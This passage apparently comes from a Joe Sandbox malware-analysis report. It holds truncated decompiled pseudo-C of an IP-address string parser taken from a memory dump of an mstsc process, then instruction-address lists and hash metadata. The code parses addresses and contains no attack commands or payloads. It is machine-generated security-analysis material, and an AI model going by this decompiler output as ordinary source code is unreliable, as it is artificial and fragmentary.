                                              								 *((short*)(_a12 + _t136 * 2)) = 0;
                                              								_v28 = 1;
                                              								_v8 = _t143;
                                              								_t136 = _t136 + 1;
                                              								L47:
                                              								_t164 = _t119;
                                              								_v20 = _t143;
                                              								L14:
                                              								if(_v24 == _t158) {
                                              									L19:
                                              									_t164 =  &(_t164[1]);
                                              									_t158 = 0;
                                              									continue;
                                              								}
                                              								if(_v12 == _t158) {
                                              									if(_v16 > 4) {
                                              										L29:
                                              										return 0xc000000d;
                                              									}
                                              									_t120 = E025FEE02(_v24, _t158, 0x10);
                                              									_t170 = _t170 + 0xc;
                                              									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                              									_t136 = _t136 + 1;
                                              									goto L19;
                                              								}
                                              								if(_v16 > 3) {
                                              									goto L29;
                                              								}
                                              								_t122 = E025FEE02(_v24, _t158, 0xa);
                                              								_t170 = _t170 + 0xc;
                                              								if(_t122 > 0xff) {
                                              									goto L29;
                                              								}
                                              								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                              								goto L19;
                                              							}
                                              						}
                                              						L21:
                                              						if(_v8 > 7 || _t167 >= 0x80) {
                                              							break;
                                              						} else {
                                              							if(E025F685D(_t167, 4) == 0) {
                                              								if(E025F685D(_t167, 0x80) != 0) {
                                              									if(_v12 > 0) {
                                              										break;
                                              									}
                                              									_t127 = 1;
                                              									_a7 = 1;
                                              									_v24 = _t164;
                                              									_v20 = 1;
                                              									_v16 = 1;
                                              									L36:
                                              									if(_v20 == _t127) {
                                              										goto L19;
                                              									}
                                              									_t158 = 0;
                                              									goto L14;
                                              								}
                                              								break;
                                              							}
                                              							_a7 = 0;
                                              							_v24 = _t164;
                                              							_v20 = 1;
                                              							_v16 = 1;
                                              							goto L19;
                                              						}
                                              					}
                                              					_t130 = _t118 - 1;
                                              					if(_t130 != 0) {
                                              						if(_t130 == 1) {
                                              							goto L21;
                                              						}
                                              						_t127 = 1;
                                              						goto L36;
                                              					}
                                              					if(_t167 >= 0x80) {
                                              						L7:
                                              						if(_t167 == 0x3a) {
                                              							_t158 = 0;
                                              							if(_v12 > 0 || _v8 > 6) {
                                              								break;
                                              							} else {
                                              								_t119 =  &(_t164[1]);
                                              								if( *_t119 != _t167) {
                                              									_v8 = _v8 + 1;
                                              									L13:
                                              									_v20 = _t158;
                                              									goto L14;
                                              								}
                                              								if(_v28 != 0) {
                                              									break;
                                              								}
                                              								_v28 = _v8 + 1;
                                              								_t143 = 2;
                                              								_v8 = _v8 + _t143;
                                              								goto L47;
                                              							}
                                              						}
                                              						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                              							break;
                                              						} else {
                                              							_v12 = _v12 + 1;
                                              							_t158 = 0;
                                              							goto L13;
                                              						}
                                              					}
                                              					if(E025F685D(_t167, 4) != 0) {
                                              						_v16 = _v16 + 1;
                                              						goto L19;
                                              					}
                                              					if(E025F685D(_t167, 0x80) != 0) {
                                              						_v16 = _v16 + 1;
                                              						if(_v12 > 0) {
                                              							break;
                                              						}
                                              						_a7 = 1;
                                              						goto L19;
                                              					}
                                              					goto L7;
                                              				}
                                              				 *_a8 = _t164;
                                              				if(_v12 != 0) {
                                              					if(_v12 != 3) {
                                              						goto L29;
                                              					}
                                              					_v8 = _v8 + 1;
                                              				}
                                              				if(_v28 != 0 || _v8 == 7) {
                                              					if(_v20 != 1) {
                                              						if(_v20 != 2) {
                                              							goto L29;
                                              						}
                                              						 *((short*)(_a12 + _t136 * 2)) = 0;
                                              						L65:
                                              						_t105 = _v28;
                                              						if(_t105 != 0) {
                                              							_t98 = (_t105 - _v8) * 2; // 0x11
                                              							E025D8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                              							_t110 = 8;
                                              							E025CDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                              						}
                                              						return 0;
                                              					}
                                              					if(_v12 != 0) {
                                              						if(_v16 > 3) {
                                              							goto L29;
                                              						}
                                              						_t114 = E025FEE02(_v24, 0, 0xa);
                                              						_t170 = _t170 + 0xc;
                                              						if(_t114 > 0xff) {
                                              							goto L29;
                                              						}
                                              						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                              						goto L65;
                                              					}
                                              					if(_v16 > 4) {
                                              						goto L29;
                                              					}
                                              					_t115 = E025FEE02(_v24, 0, 0x10);
                                              					_t170 = _t170 + 0xc;
                                              					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                              					goto L65;
                                              				} else {
                                              					goto L29;
                                              				}
                                              			}

























                                              0x025ffcd1
                                              0x025ffcd6
                                              0x025ffcd9
                                              0x025ffcdc
                                              0x025ffcdf
                                              0x025ffce2
                                              0x025ffce5
                                              0x025ffce8
                                              0x025ffceb
                                              0x025ffced
                                              0x025ffced
                                              0x025ffcf3
                                              0x00000000
                                              0x00000000
                                              0x025ffcfc
                                              0x025ffcfe
                                              0x025ffdc1
                                              0x0262ecbd
                                              0x00000000
                                              0x0262eccc
                                              0x0262eccc
                                              0x0262ecd2
                                              0x00000000
                                              0x00000000
                                              0x0262ecdf
                                              0x0262ece0
                                              0x0262ece4
                                              0x0262eceb
                                              0x0262ecee
                                              0x0262eca8
                                              0x0262eca8
                                              0x0262ecaa
                                              0x025ffd76
                                              0x025ffd79
                                              0x025ffdb4
                                              0x025ffdb5
                                              0x025ffdb6
                                              0x00000000
                                              0x025ffdb6
                                              0x025ffd7e
                                              0x0262ecfc
                                              0x025ffe2f
                                              0x00000000
                                              0x025ffe2f
                                              0x0262ed08
                                              0x0262ed0f
                                              0x0262ed17
                                              0x0262ed1b
                                              0x00000000
                                              0x0262ed1b
                                              0x025ffd88
                                              0x00000000
                                              0x00000000
                                              0x025ffd94
                                              0x025ffd99
                                              0x025ffda1
                                              0x00000000
                                              0x00000000
                                              0x025ffdb0
                                              0x00000000
                                              0x025ffdb0
                                              0x0262ecbd
                                              0x025ffdc7
                                              0x025ffdcb
                                              0x00000000
                                              0x025ffdd7
                                              0x025ffde3
                                              0x025ffe06
                                              0x02611fe7
                                              0x00000000
                                              0x00000000
                                              0x02611fef
                                              0x02611ff0
                                              0x02611ff4
                                              0x02611ff7
                                              0x02611ffa
                                              0x02611ffd
                                              0x02612000
                                              0x00000000
                                              0x00000000
                                              0x0262ecf1
                                              0x00000000
                                              0x0262ecf1
                                              0x00000000
                                              0x025ffe06
                                              0x025ffde8
                                              0x025ffdec
                                              0x025ffdef
                                              0x025ffdf2
                                              0x00000000
                                              0x025ffdf2
                                              0x025ffdcb
                                              0x025ffd04
                                              0x025ffd05
                                              0x0262ec67
                                              0x00000000
                                              0x00000000
                                              0x0262ec6f
                                              0x00000000
                                              0x0262ec6f
                                              0x025ffd13
                                              0x025ffd3c
                                              0x025ffd40
                                              0x0262ec75
                                              0x0262ec7a
                                              0x00000000
                                              0x0262ec8a
                                              0x0262ec8a
                                              0x0262ec90
                                              0x0262ecb2
                                              0x025ffd73
                                              0x025ffd73
                                              0x00000000
                                              0x025ffd73
                                              0x0262ec95
                                              0x00000000
                                              0x00000000
                                              0x0262eca1
                                              0x0262eca4
                                              0x0262eca5
                                              0x00000000
                                              0x0262eca5
                                              0x0262ec7a
                                              0x025ffd4a
                                              0x00000000
                                              0x025ffd6e
                                              0x025ffd6e
                                              0x025ffd71
                                              0x00000000
                                              0x025ffd71
                                              0x025ffd4a
                                              0x025ffd21
                                              0x0260a3a1
                                              0x00000000
                                              0x0260a3a1
                                              0x025ffd36
                                              0x0261200b
                                              0x02612012
                                              0x00000000
                                              0x00000000
                                              0x02612018
                                              0x00000000
                                              0x02612018
                                              0x00000000
                                              0x025ffd36
                                              0x025ffe0f
                                              0x025ffe16
                                              0x0260a3ad
                                              0x00000000
                                              0x00000000
                                              0x0260a3b3
                                              0x0260a3b3
                                              0x025ffe1f
                                              0x0262ed25
                                              0x0262ed86
                                              0x00000000
                                              0x00000000
                                              0x0262ed91
                                              0x0262ed95
                                              0x0262ed95
                                              0x0262ed9a
                                              0x0262edad
                                              0x0262edb3
                                              0x0262edba
                                              0x0262edc4
                                              0x0262edc9
                                              0x00000000
                                              0x0262edcc
                                              0x0262ed2a
                                              0x0262ed55
                                              0x00000000
                                              0x00000000
                                              0x0262ed61
                                              0x0262ed66
                                              0x0262ed6e
                                              0x00000000
                                              0x00000000
                                              0x0262ed7d
                                              0x00000000
                                              0x0262ed7d
                                              0x0262ed30
                                              0x00000000
                                              0x00000000
                                              0x0262ed3c
                                              0x0262ed43
                                              0x0262ed4b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: __fassign
                                              • String ID:
                                              • API String ID: 3965848254-0
                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                              • Instruction ID: 4baa1391d1b90040f6def001136a2c9c9f4897c04eee926816d3b531da89bbad
                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                              • Instruction Fuzzy Hash: 7E91B131D0021AEBCFA5CF94C8446EEBBB4FF81308F20847AD615A7A91E7315A45CB99
                                              Uniqueness

                                              Uniqueness Score: -1.00%